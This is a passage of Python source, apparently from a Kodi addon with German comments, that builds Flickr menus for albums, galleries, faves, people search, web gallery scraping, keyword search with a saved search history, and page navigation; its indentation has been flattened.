thumb=R(ICON_UPDATER_NEW), fparams=fparams, summary=summary)
if call_update == False: # Update-Button "Suche" zeigen
title = 'Addon-Update | akt. Version: ' + VERSION + ' vom ' + VDATE
summary='Suche nach neuen Updates starten'
tagline='Bezugsquelle: ' + repo_url
fparams="&fparams={'title': 'Addon-Update'}"
addDir(li=li, label=title, action="dirList", dirID="SearchUpdate", fanart=R(FANART),
thumb=R(ICON_MAIN_UPDATER), fparams=fparams, summary=summary, tagline=tagline)
# Info-Button
summary = L('Stoerungsmeldungen an Forum oder rols1@gmx.de')
tagline = u'für weitere Infos (changelog.txt) klicken'
path = os.path.join(ADDON_PATH, "changelog.txt")
title = u"Änderungsliste (changelog.txt)"
path=py2_encode(path); title=py2_encode(title);
fparams="&fparams={'path': '%s', 'title': '%s'}" % (quote(path), quote(title))
addDir(li=li, label='Info', action="dirList", dirID="ShowText", fanart=R(FANART), thumb=R(ICON_INFO),
fparams=fparams, summary=summary, tagline=tagline)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=False)
#----------------------------------------------------------------
def ShowText(path, title):
PLog('ShowText:');
page = RLoad(path, abs_path=True)
page = page.replace('\t', ' ') # ersetze Tab's durch Blanks
dialog = xbmcgui.Dialog()
dialog.textviewer(title, page)
return
#----------------------------------------------------------------
# sender neu belegt in Senderwahl (Classic: deaktiviert)
####################################################################################################
# Doppelnutzung MyMenu: SETTINGS.getSetting('username') + FlickrPeople
#
# Rücksprung aus MyMenu/User -> Main
# Rücksprung aus MyMenu/SETTINGS.getSetting('username') -> FlickrPeople
# Rücksprung aus Untermenüs ohne user_id -> Main
# Rücksprung aus Untermenüs mit user_id -> MyMenu
#
def home(li,user_id,username='', returnto=''):
PLog('home:') # eingetragener User (Einstellungen)
PLog('user_id: %s, username: %s, returnto: %s' % (str(user_id), str(username), str(returnto)))
li = xbmcgui.ListItem()
if returnto == 'FlickrPeople': # MyMenu -> FlickrPeople
title = py2_decode(L('Zurueck zu')) + ' ' + py2_decode(L('Flickr Nutzer'))
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R('homePeople.png'),
thumb=R('homePeople.png'), fparams=fparams)
return li
if returnto == 'Main':
title = L('Zurueck zum Hauptmenue') # MyMenu -> Hauptmenue
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R('home.png'),
thumb=R('home.png'), fparams=fparams)
return li
if user_id: # Untermenüs: User (SETTINGS.getSetting('username') oder Flickr People)
if username == '':
user_id,nsid,username,realname = GetUserID(user_id)
title = py2_decode(L('Zurueck zu')) + ' ' + username
username=py2_encode(username); user_id=py2_encode(user_id);
fparams="&fparams={'username': '%s', 'user_id': '%s'}" % (quote(username), quote(user_id))
addDir(li=li, label=title, action="dirList", dirID="MyMenu", fanart=R('homePeople.png'),
thumb=R('homePeople.png'), fparams=fparams)
return li
title = L('Zurueck zum Hauptmenue') # Untermenüs: ohne user_id
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R('home.png'), thumb=R('home.png'), fparams=fparams)
return li
####################################################################################################
# Userabhängige Menüs
# 2-fache Verwendung:
# 1. Aufrufer Main - für den User aus Einstellungen SETTINGS.getSetting('username')
# 2. Aufrufer FlickrPeople - für einen ausgewählten User aus FlickrPeople
#
def MyMenu(username='',user_id=''):
PLog('MyMenu:')
PLog('user_id: %s, username: %s' % (str(user_id), str(username)))
if username=='' and user_id=='': # aus Main, User aus Einstellungen
if SETTINGS.getSetting('username'):
user = SETTINGS.getSetting('username').strip()
user_id,nsid,username,realname = GetUserID(user)
# Ergebnis zusätzl. in Dicts (nicht bei ausgewählten usern (FlickrPeople):
Dict('store', 'user', user); Dict('store', 'nsid', nsid); Dict('store', 'username', username);
Dict('store', 'realname', realname);
PLog('user_id: %s, nsid: %s, username: %s, realname: %s' % (user_id,nsid,username,realname))
if 'User not found' in user_id: # err code aus GetUserID
msg1 = L("User not found") + ': %s' % user
MyDialog(msg1, '', '')
return
PLog(Dict('load','nsid'))
nsid = user_id
if nsid == Dict('load','nsid'):
returnto ='Main'
else:
returnto ='FlickrPeople'
li = xbmcgui.ListItem()
li = home(li, user_id=user_id, returnto=returnto) # Home-Button
title = 'Search: content owned by %s' % (username)
summ = L('Suche') + ' ' + L('Fotos')
title=py2_encode(title);
fparams="&fparams={'user_id': '%s', 'title': '%s'}" % (nsid, quote(title))
addDir(li=li, label=title, action="dirList", dirID="Search", fanart=R(ICON_SEARCH), thumb=R(ICON_SEARCH),
fparams=fparams, summary=summ)
title='%s: Photostream' % username
fparams="&fparams={'query': '%s', 'user_id': '%s'}" % (quote('&Photostream&'), nsid)
addDir(li=li, label=title, action="dirList", dirID="Search_Work", fanart=R('icon-stream.png'), thumb=R('icon-stream.png'),
fparams=fparams, summary=title)
title='%s: Albums' % username
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '1'}" % ( quote(title), nsid)
addDir(li=li, label=title, action="dirList", dirID="MyAlbums", fanart=R('icon-album.png'), thumb=R('icon-album.png'),
fparams=fparams, summary=title)
title='%s: Galleries' % username
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'user_id': '%s'}" % (quote(title), nsid)
addDir(li=li, label=title, action="dirList", dirID="MyGalleries", fanart=R('icon-gallery.png'),
thumb=R('icon-gallery.png'), fparams=fparams, summary=title)
title='%s: Faves' % username
fparams="&fparams={'query': '%s', 'user_id': '%s'}" % (quote('&Faves&'), nsid)
addDir(li=li, label=title, action="dirList", dirID="Search_Work", fanart=R('icon-fav.png'), thumb=R('icon-fav.png'),
fparams=fparams, summary=title)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=False)
#------------------------------------------------------------------------------------------
# Begrenzung der Anzahl auf 100 festgelegt. Keine Vorgabe in Einstellungen, da Flickr unterschiedlich mit
# den Mengen umgeht (seitenweise, einzeln, ohne). Z.B. in galleries.getList nur 1 Seite - Mehr-Sprünge daher
# mit max_count=100.
# Flickr-Ausgabe im xml-Format.
def MyGalleries(title, user_id, offset=0):
PLog('MyGalleries:'); PLog('offset: ' + str(offset))
offset = int(offset)
title_org = title
max_count = 100 # Begrenzung fest wie Flickr Default
path = BuildPath(method='flickr.galleries.getList', query_flickr='', user_id=user_id, pagenr=1)
page, msg = RequestUrl(CallerName='MyGalleries', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
cnt = stringextract('total="', '"', page) # im Header
pages = stringextract('pages="', '"', page)
PLog('Galleries: %s, Seiten: %s' % (cnt, pages))
if cnt == '0' or pages == '':
msg1 = L('Keine Gallerien gefunden')
MyDialog(msg1, '', '')
return
li = xbmcgui.ListItem()
li = home(li, user_id=user_id) # Home-Button
records = blockextract('<gallery id', '', page)
pagemax = int(len(records))
PLog('total: ' + str(pagemax))
i=0 + offset
loop_i = 0 # Schleifenzähler
# PLog(records[i])
for r in records:
title = stringextract('<title>', '</title>', records[i])
title = unescape(title)
url = stringextract('url="', '"', records[i])
username = stringextract('username="', '"', records[i])
count_photos = stringextract('count_photos="', '"', records[i])
summ = '%s: %s %s' % (username, count_photos, L('Fotos'))
img_src = R(ICON_FLICKR)
i=i+1; loop_i=loop_i+1
if i >= pagemax:
break
if loop_i > max_count:
break
gallery_id = url.split('/')[-1] # Bsp. 72157697209149355
if url.endswith('/'):
gallery_id = url.split('/')[-2] # Url-Ende bei FlickrPeople ohne /
PLog(i); PLog(url);PLog(title);PLog(img_src); PLog(gallery_id);
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'gallery_id': '%s', 'user_id': '%s'}" % (quote(title), gallery_id, user_id)
addDir(li=li, label=title, action="dirList", dirID="Gallery_single", fanart=R(img_src), thumb=R(img_src),
fparams=fparams, summary=summ)
PLog(offset); PLog(pagemax); # pagemax hier Anzahl Galleries
tag = 'total: %s ' % pagemax + L('Galerien')
name = title_org
if (int(offset)+100) < int(pagemax):
offset = min(int(offset) +100, pagemax)
PLog(offset)
title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'offset': '%s'}" % (quote(title_org), offset)
addDir(li=li, label=title_org, action="dirList", dirID="MyGalleries", fanart=R(ICON_MEHR_100),
thumb=R(ICON_MEHR_100), fparams=fparams, summary=L('Mehr (+ 100)'), tagline=tag)
# weniger
if int(offset) > 100:
offset = max(int(offset)-100-max_count, 0)
PLog(offset)
title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'offset': '%s'}" % (quote(title_org), offset)
addDir(li=li, label=title_org, action="dirList", dirID="MyGalleries", fanart=R(ICON_WENIGER_100),
thumb=R(ICON_WENIGER_100), fparams=fparams, summary=L('Weniger (- 100)'), tagline=tag)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#------------------------------------------------------------------------------------------
# Bezeichnung in Flickr-API: Photosets
# Mehrere Seiten - anders als MyGalleries
# Flickr-Ausgabe im xml-Format.
# Workflow:
# MyAlbums -> MyAlbumsSingle -> BuildPath -> BuildPages -> SeparateVideos -> ShowPhotoObject
#
def MyAlbums(title, user_id, pagenr):
PLog('MyAlbums:'); PLog('page: ' + str(pagenr))
title_org = title # title_org: Username
path = BuildPath(method='flickr.photosets.getList', query_flickr='', user_id=user_id, pagenr=pagenr)
page, msg = RequestUrl(CallerName='MyAlbums', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
pages = stringextract('pages="', '"', page) # im Header, Anz. Seiten
alben_max = stringextract('total="', '"', page) # im Header
perpage = stringextract('perpage="', '"', page) # im Header
thispagenr = stringextract('page="', '"', page) # im Header, sollte pagenr entsprechen
PLog('Alben: %s, Seite: %s von %s, perpage: %s' % (alben_max, thispagenr, pages, perpage))
name = '%s %s/%s' % (L('Seite'), pagenr, pages)
li = xbmcgui.ListItem()
li = home(li, user_id=user_id) # Home-Button
if alben_max == '0':
msg1 = L('Keine Alben gefunden')
MyDialog(msg1, '', '')
return
records = blockextract('<photoset id', '', page)
PLog('records: ' + str(len(records)))
for rec in records:
title = stringextract('<title>', '</title>', rec)
photoset_id = stringextract('id="', '"', rec)
description = stringextract('description="', '"', rec)
count_photos = stringextract('photos="', '"', rec)
secret = stringextract('secret=\"', '\"', rec)
serverid = stringextract('server=\"', '\"', rec)
farmid = stringextract('farm=\"', '\"', rec)
title=unescape(title); title=repl_json_chars(title)
# Url-Format: https://www.flickr.com/services/api/misc.urls.html
# thumb_src = 'https://farm%s.staticflickr.com/%s/%s_%s_z.jpg' % (farmid, serverid, photoset_id, secret) # m=small (240)
# Anforderung Url-Set in BuildPath -> BuildExtras
thumb_src = stringextract('url_z="', '"', rec) # z=640
summ = "%s %s (%s)" % (count_photos, L('Fotos'), title_org) # Anzahl stimmt nicht
if description:
summ = '%s | %s' % (summ, description)
img_src = R(ICON_FLICKR)
PLog('1Satz:')
PLog(title);PLog(photoset_id);PLog(thumb_src);
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'photoset_id': '%s', 'user_id': '%s'}" % (quote(title), photoset_id,
user_id)
addDir(li=li, label=title, action="dirList", dirID="MyAlbumsSingle", fanart=thumb_src, thumb=thumb_src,
fparams=fparams, summary=summ)
# auf mehr prüfen:
PLog(pagenr); PLog(pages);
page_next = int(pagenr) + 1
tag = 'total: %s %s, %s %s ' % (alben_max, L('Alben'), pages, L('Seiten'))
title_org=py2_encode(title_org);
if page_next <= int(pages):
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_MEHR_1), thumb=R(ICON_MEHR_1),
fparams=fparams, summary=L('Mehr (+ 1)'), tagline=tag)
if (page_next+10) < int(pages):
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_MEHR_10), thumb=R(ICON_MEHR_10),
fparams=fparams, summary=L('Mehr (+ 10)'), tagline=tag)
if (page_next+100) < int(pages):
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_MEHR_100), thumb=R(ICON_MEHR_100),
fparams=fparams, summary=L('Mehr (+ 100)'), tagline=tag)
# weniger
page_next = int(pagenr) - 1
if page_next >= 1:
page_next = page_next - 1
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_WENIGER_1), thumb=R(ICON_WENIGER_1),
fparams=fparams, summary=L('Weniger (- 1)'), tagline=tag)
if page_next > 10:
page_next = page_next - 10
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_WENIGER_10), thumb=R(ICON_WENIGER_10),
fparams=fparams, summary=L('Weniger (- 10)'), tagline=tag)
if page_next > 100:
page_next = page_next - 100
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_WENIGER_100), thumb=R(ICON_WENIGER_100),
fparams=fparams, summary=L('Weniger (- 100)'), tagline=tag)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#------------------------------------------------------------------------------------------
# Bezeichnung in Flickr-API: Photosets
# Mehrere Seiten - anders als MyGalleries
# Flickr-Ausgabe im xml-Format.
# Seitensteuerung durch BuildPages (-> SeparateVideos -> ShowPhotoObject, ShowVideos)
#
def MyAlbumsSingle(title, photoset_id, user_id, pagenr=1):
PLog('MyAlbumsSingle:')
mymethod = 'flickr.photosets.getPhotos'
path = BuildPath(method=mymethod, query_flickr=mymethod, user_id=user_id, pagenr=1,
photoset_id=photoset_id)
page, msg = RequestUrl(CallerName='MyAlbumsSingle', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
pagemax = stringextract('pages="', '"', page)
perpage = stringextract('perpage="', '"', page)
PLog(pagemax); PLog(perpage) # flickr-Angabe stimmt nicht mit?
records = blockextract('<photo id', '', page) # ShowPhotoObject: nur '<photo id'-Blöcke zulässig
maxPageContent = SETTINGS.getSetting('maxPageContent')
mypagemax = len(records) / int(maxPageContent)
PLog('2Satz:')
PLog('records: %s, maxPageContent: %s, mypagemax: %s' % (str(len(records)), maxPageContent, str(mypagemax)))
# mypagemax = int(round(mypagemax + 0.49)) # zwangsw. aufrunden - entfällt
# PLog('mypagemax: %s' % str(mypagemax))
searchname = '#MyAlbumsSingle#'
li = BuildPages(title=title, searchname=searchname, SEARCHPATH=path, pagemax=pagemax, perpage=perpage,
pagenr=1)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
####################################################################################################
# --------------------------
# FlickrPeople: gesucht wird auf der Webseite mit dem Suchbegriff fuer Menue Flickr Nutzer.
# Flickr liefert bei Fehlschlag den angemeldeten Nutzer zurück
# Exaktheit der Websuche nicht beeinflussbar.
#
def FlickrPeople(pagenr=1):
PLog('FlickrPeople: ' + str(SETTINGS.getSetting('FlickrPeople')))
PLog('pagenr: ' + str(pagenr))
pagenr = int(pagenr)
if SETTINGS.getSetting('FlickrPeople'):
username = SETTINGS.getSetting('FlickrPeople').replace(' ', '%20') # Leerz. -> url-konform
path = 'https://www.flickr.com/search/people/?username=%s&page=%s' % (username, pagenr)
else:
msg1 = L('Einstellungen: Suchbegriff für Flickr Nutzer fehlt')
MyDialog(msg1, '', '')
return
title2 = 'Flickr People ' + L('Seite') + ' ' + str(pagenr)
li = xbmcgui.ListItem()
li = home(li, user_id='') # Home-Button
page, msg = RequestUrl(CallerName='FlickrPeople', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
page = page.replace('\\', '') # Pfadbehandl. im json-Bereich
total = 0
# totalItems[2] enthält die Anzahl. Falls page zu groß (keine weiteren
# Ergebnisse), enthalten sie 0.
try:
totalItems = re.findall(r'totalItems":(\d+)\}\]', page) # Bsp. "totalItems":7}]
PLog(totalItems)
total = int(totalItems[0])
except Exception as exception:
PLog(str(exception))
PLog("total: " + str(total))
records = blockextract('_flickrModelRegistry":"search-contact-models"', 'flickrModelRegistry', page)
PLog(len(records))
thumb=R('icon-my.png')
i = 0 # loop count
for rec in records:
# PLog(rec)
nsid = stringextract('id":"', '"', rec)
if '@N' not in nsid:
continue
username = stringextract('username":"', '"', rec)
username=unescape(username); username=unquote(username)
realname = stringextract('realname":"', '"', rec)
alias = stringextract('pathAlias":"', '"', rec) # kann fehlen
alias = unescape(alias); alias = unquote(alias)
if alias == '':
alias = username
iconfarm = stringextract('iconfarm":"', '"', rec)
iconserver = stringextract('iconserver":"', '"', rec)
followersCount = stringextract('followersCount":', ',', rec)
if followersCount == '':
followersCount = '0'
photosCount = stringextract('photosCount":', ',', rec)
if photosCount == '': # # photosCount kann fehlen
photosCount = '0'
iconserver = stringextract('iconserver":"', '"', rec)
title = "%s | %s" % (username, realname)
PLog(title)
title=unescape(title); title=unquote(title)
summ = "%s: %s" % (L('Fotos'), photosCount)
summ = summ + " | %s: %s | Alias: %s" % (L('Followers'), followersCount, alias)
PLog('5Satz')
PLog("username: %s, nsid: %s" % (username, nsid)); PLog(title)
if realname:
label=realname
else:
label=username
label=unescape(label); label=unquote(label)
username=py2_encode(username);
fparams="&fparams={'username': '%s', 'user_id': '%s'}" % (quote(username), nsid)
addDir(li=li, label=label, action="dirList", dirID="MyMenu", fanart=thumb, thumb=thumb,
fparams=fparams, summary=summ)
i = i + 1
if i == 0:
msg = SETTINGS.getSetting('FlickrPeople') + ': ' + L('kein Treffer')
PLog(msg)
msg1=msg
MyDialog(msg1, '', '')
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
# plus/minus 1 Seite:
PLog(pagenr * len(records)); PLog(total)
if (pagenr * len(records)) < total:
title = 'FlickrPeople ' + L('Seite') + ' ' + str(pagenr+1)
fparams="&fparams={'pagenr': '%s'}" % (pagenr+1)
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R(ICON_MEHR_1),
thumb=R(ICON_MEHR_1), fparams=fparams, summary=L('Mehr (+ 1)'))
if pagenr > 1:
title = 'FlickrPeople ' + L('Seite') + ' ' + str(pagenr-1)
fparams="&fparams={'pagenr': '%s'}" % (pagenr-1)
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R(ICON_WENIGER_1),
thumb=R(ICON_WENIGER_1), fparams=fparams, summary=L('Weniger (- 1)'))
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
####################################################################################################
# für Gallerie-Liste ohne user_id kein API-Call verfügbar - Auswertung der Webseite (komb. html/json)
# Keine Sortierung durch Flickr möglich - i.G. zu MyGalleries (sort_groups)
# 08.09.2019 Blockmerkmal geändert ('gallery-hunk clearfix -> 'class="tile-container">'
# Scrollmechnismus - nur ein Teil der Webinhalte verfügbar.
#
def WebGalleries(pagenr):
PLog('WebGalleries: pagenr=' + pagenr)
if int(pagenr) < 1:
pagenr = "1"
path = GALLERY_PATH + 'page%s/' % (pagenr) # Zusatz '?rb=1' nur in Watchdog erforderlich (302 Found)
page, msg = RequestUrl(CallerName='WebGalleries: page %s' % pagenr, url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:50])
# die enthaltenen Parameter page + perPage wirken sich verm. nicht auf die
# Seitenberechnung aus. Das Web zeigt jeweils 3 Vorschaubilder zu jeder Gallerie,
# nach 24 Galerien erscheinen beim Scrolldown jeweils neue 24 Galerien.
#
# Alternative ohne Bilder: Bereich "class="view pagination-view" enthält die
# Links zu den einzelnen Seiten.
totalItems = stringextract('totalItems":', '}', page) # Anzahl Galerien json-Bereich
PageSize = stringextract('viewPageSize":', ',', page)
PLog(totalItems); PLog(PageSize);
try:
pages = float(totalItems) / float(PageSize)
pagemax = int(math.ceil(pages)) # max. Seitenzahl, aufrunden für Seitenrest
except Exception as exception:
PLog(str(exception))
pagemax = 1
msg1 = "WebGalleries: " + L('Ermittlung der Seitenzahl gescheitert')
msg2 = "Gezeigt wird nur die erste Seite"
MyDialog(msg1, '', '')
PLog('pagemax: ' + str(pagemax));
name = L('Seite') + ' ' + pagenr + L('von') + ' ' + str(pagemax)
li = xbmcgui.ListItem()
li = home(li, user_id='') # Home-Button
records = blockextract('class="tile-container">', '', page) # oder gallery-case gallery-case-user
if len(records) == 0:
msg1 = L("Keine Gallerien gefunden")
MyDialog(msg1, '', '')
return
PLog(len(records))
for rec in records: # Elemente pro Seite: 12
# PLog(rec) # bei Bedarf
href = BASE + stringextract('href="', '"', rec) # Bsp. https://www.flickr.com/photos/flickr/galleries/..
try:
href_id = href.split('/')[-2]
except:
href_id = ''
img_src = img_via_id(href_id, page)
gallery_id = href_id
title = stringextract('gallery-title">', '</h4>', rec) # in href
title=py2_encode(title);
title=cleanhtml(title); title=mystrip(title);
title=unescape(title); title=repl_json_chars(title)
nr_shown = stringextract('stat item-count">', '</span>', rec) # Anzahl, Bsp.: 15 photos
nr_shown = mystrip(nr_shown)
views = stringextract('stat view-count">', '</span>', rec) # Views, Bsp.: 3.3K views
views = views.strip()
comments = stringextract('stat comment-count">', '</span>', rec) # Views, Bsp.: 17 comments
comments = mystrip(comments)
summ = "%s | %s | %s" % (nr_shown, views, comments )
PLog('6Satz:')
PLog(href);PLog(img_src);PLog(title);PLog(summ);PLog(gallery_id);
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'gallery_id': '%s', 'user_id': '%s'}" % (quote(title), gallery_id, '')
addDir(li=li, label=title, action="dirList", dirID="Gallery_single", fanart=img_src, thumb=img_src,
fparams=fparams, summary=summ)
# auf mehr prüfen:
PLog("pagenr: %s, pagemax: %s" % (pagenr, pagemax))
pagenr = int(pagenr)
if pagenr < pagemax:
page_next = pagenr + 1 # Pfad-Offset + 1
path = GALLERY_PATH + 'page%s/' % str(page_next)
PLog(path);
title = "%s, %s %s %s %s" % (L('Galerien'), L('Seite'), str(page_next), L('von'), str(pagemax))
fparams="&fparams={'pagenr': '%s'}" % str(page_next)
addDir(li=li, label=title, action="dirList", dirID="WebGalleries", fanart=R(ICON_MEHR_1),
thumb=R(ICON_MEHR_1), fparams=fparams)
# weniger
if pagenr > 1:
page_next = pagenr - 1 # Pfad-Offset - 1
title = "%s, %s %s %s %s" % (L('Galerien'), L('Seite'), str(page_next), L('von'), str(pagemax))
fparams="&fparams={'pagenr': '%s'}" % str(page_next)
addDir(li=li, label=title, action="dirList", dirID="WebGalleries", fanart=R(ICON_WENIGER_1),
thumb=R(ICON_WENIGER_1), fparams=fparams)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#---------------------------------------
# img_via_id: ermittelt im json-Teil (ARD-Neu) via href_id
def img_via_id(href_id, page):
PLog("img_via_id: " + href_id)
if href_id == '':
img_src = R(ICON_FOLDER)
return img_src # Fallback bei fehlender href_id
records = blockextract('"compoundId":', '', page)
for rec in records:
if href_id in rec:
img_src = stringextract('"displayUrl":"', '"', rec)
img_src = img_src.replace('\\', '')
img_src = img_src.replace('_s', '') # ..475efd8f73_s.jpg
if img_src.startswith('https') == False:
img_src = 'https:' + img_src
if len(img_src) > 10:
return img_src
else:
return R(ICON_FOLDER)
#------------------------------------------------------------------------------------------
# Erzeugt Foto-Objekte für WebGalleries + MyGalleries (Pfade -> Rückgabe im xml-Format).
# Die Thumbnails von Flickr werden nicht gebraucht - erzeugt Plex selbst aus den Originalen
# max. Anzahl Fotos in Galerie: 50 (https://www.flickr.com/help/forum/en-us/72157646468539299/)
# z.Z. keine Steuerung mehr / weniger nötig
def Gallery_single(title, gallery_id, user_id):
PLog('Gallery_single: ' + gallery_id)
searchname = '#Gallery#'
# pagenr hier weglassen - neu in BuildPages
href = BuildPath(method='flickr.galleries.getPhotos', query_flickr='', user_id=user_id, pagenr='')
href = href + "&gallery_id=%s" % (gallery_id)
li = BuildPages(title=title, searchname=searchname, SEARCHPATH=href, pagemax='?', perpage=1,
pagenr='?')
return li
####################################################################################################
# API-Format: https://api.flickr.com/services/rest/?method=flickr.photos.search&api_key=
# 24df437b03dd7bf070ba220aa717027e&text=Suchbegriff&page=3&format=rest
# Rückgabeformat XML
#
# Verwendet wird die freie Textsuche (s. API): Treffer möglich in Titel, Beschreibung + Tags
# Mehrere Suchbegriffe, getrennt durch Blanks, bewirken UND-Verknüpfung.
#
# 23.09.2020 Liste für letzte Suchbegriffe - hier ohne Rücksicht auf
# das Suchergebnis
#
def Search(query='', user_id='', pagenr=1, title=''):
PLog('Search: ' + query);
# wir springen direkt - Ablauf:
# Search -> Search_Work -> BuildPages (-> SeparateVideos -> ShowPhotoObject, ShowVideos)
query_file = os.path.join("%s/search_terms") % ADDON_DATA
if query == '': # Liste letzte Sucheingaben
query_recent = RLoad(query_file, abs_path=True)
if query_recent.strip():
head = L('Suche')
search_list = [head]
query_recent= query_recent.strip().splitlines()
query_recent=sorted(query_recent, key=str.lower)
search_list = search_list + query_recent
title = L('Suche') + ': ' + L('im oeffentlichen Inhalt')
ret = xbmcgui.Dialog().select(title, search_list, preselect=0)
PLog(ret)
if ret == -1:
PLog("Liste Sucheingabe abgebrochen")
return Main()
elif ret == 0:
query = ''
else:
query = search_list[ret]
if query == '':
query = get_keyboard_input() # Modul util
if query == None or query.strip() == '':
return ""
query = query.strip(); query_org = query
# wg. fehlender Rückgabewerte speichern wir ohne Rücksicht
# auf das Suchergebnis:
if query: # leere Eingabe vermeiden
query_recent= RLoad(query_file, abs_path=True) # Sucheingabe speichern
query_recent= query_recent.strip().splitlines()
if len(query_recent) >= 24: # 1. Eintrag löschen (ältester)
del query_recent[0]
query_org=py2_encode(query_org) # unquoted speichern
if query_org not in query_recent:
query_recent.append(query_org)
query_recent = "\n".join(query_recent)
query_recent = py2_encode(query_recent)
RSave(query_file, query_recent) # withcodec: code-error
Search_Work(query=py2_encode(query), user_id=user_id)
return
# --------------------------
# Search_Work: ermöglicht die Flickr-Suchfunktion außerhalb der normalen Suchfunktion, z.B.
# Photostream + Faves. Die normale Suchfunktion startet in Search, alle anderen hier.
# Ablauf:
# Search_Work -> Seitensteuerung durch BuildPages (-> SeparateVideos -> ShowPhotoObject, ShowVideos)
#
# query='#Suchbegriff#' möglich (MyMenu: MyPhotostream, MyFaves) - Behandl. in BuildPath
# 10.04.2020 wg. coding-Problemen geändert in '&Suchbegriff&'
# query='None' möglich (Photostream)
#
# URL's: viele Foto-Sets enthalten unterschiedliche Größen - erster Ansatz, Anforderung mit b=groß,
# schlug häufig fehl. Daher Anforderung mit einer Suffix-Liste (extras), siehe
# https://www.flickr.com/services/api/misc.urls.html, und Entnahme der "größten" URL.
#
def Search_Work(query, user_id, SEARCHPATH=''):
PLog('Search_Work: ' + query);
query_flickr = quote(query)
if query == '&Faves&': # MyFaves
SEARCHPATH = BuildPath(method='flickr.favorites.getList', query_flickr=query_flickr, user_id=user_id, pagenr='')
else:
# BuildPath liefert zusätzlich Dict['extras_list'] für Fotoauswahl (s.u.)
SEARCHPATH = BuildPath(method='flickr.photos.search', query_flickr=query_flickr, user_id=user_id, pagenr='')
PLog(SEARCHPATH)
if query == 'None': # von Photostream
searchname = L('Seite')
title='Photostream'
else:
searchname = L('Suche') + ': ' + query + ' ' + L('Seite')
title=query
if query.startswith('&') and query.endswith('&'):# von MyPhotostream / MyFaves
title = query.replace('&', '')
searchname = L('Seite') # Ergänzung in BuildPages
PLog(title)
BuildPages(title=title, searchname=searchname, SEARCHPATH=SEARCHPATH, pagemax=1, perpage=1, pagenr='?')
return
#----------------------------------------------------------------
# Ausgabesteuerung für Fotoseiten: Buttons für die einzelnen Seiten, einschl. Mehr/Weniger.
# Falls nur 1 Seite vorliegt, wird SeparateVideos direkt angesteuert.
# Auslagerung ShowPhotoObject für PHT erforderlich (verträgt keine Steuer-Buttons)
# searchname steuert Belegung von title2 des ObjectContainers - Einfassung
# durch ## kennzeichnet: keine Suche
# perpage setzen wir wg. des PHT-Problems nicht bei der Fotoausgabe einer einzelnen
# Seite um - Flickr-Default hier 100 (dto. bei Suche).
# Bei Überschreitung der Seitenzahl (page) zeigt Flickr die letzte verfügbare Seite.
# Die Seitenberechnung stimmt bei Flickr nur dann, wenn bei max. Bildgröße
# "Originalbild" gewählt ist. Bei kleineren Größen rechnet Flickr die weggefallenen
# Seiten nicht heraus - dann zeigt das Addon wieder die erste Seite, obwohl laut
# noch weitere Seiten existieren.
def BuildPages(title, searchname, SEARCHPATH, pagemax=1, perpage=1, pagenr=1, photototal=1):
PLog('BuildPages:')
PLog('SEARCHPATH: %s' % (SEARCHPATH))
PLog(pagenr); PLog(title)
title_org = title
if pagenr == '?' or pagenr == '': # Inhalt noch unbekannt
page, msg = RequestUrl(CallerName='BuildPages', url=SEARCHPATH)
if page == '':
msg1=msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
if '<rsp stat="ok">' not in page or 'pages="0"' in page:
msg1 = L('kein Treffer')
MyDialog(msg1, '', '')
return
pagemax = stringextract('pages="', '"', page)
photototal = stringextract('total="', '"', page) # z.Z. n.b.
perpage = stringextract('perpage="', '"', page) # Flickr default: 100 pro Seite
pagenr = 1 # Start mit Seite
PLog('Flickr: pagemax %s, total %s, perpage %s' % (pagemax, photototal, perpage))
pagenr = int(pagenr); pagemax = int(pagemax);
maxPageContent = 500 # Maximum Flickr
if SETTINGS.getSetting('maxPageContent'): # Objekte pro Seite (Einstellungen)
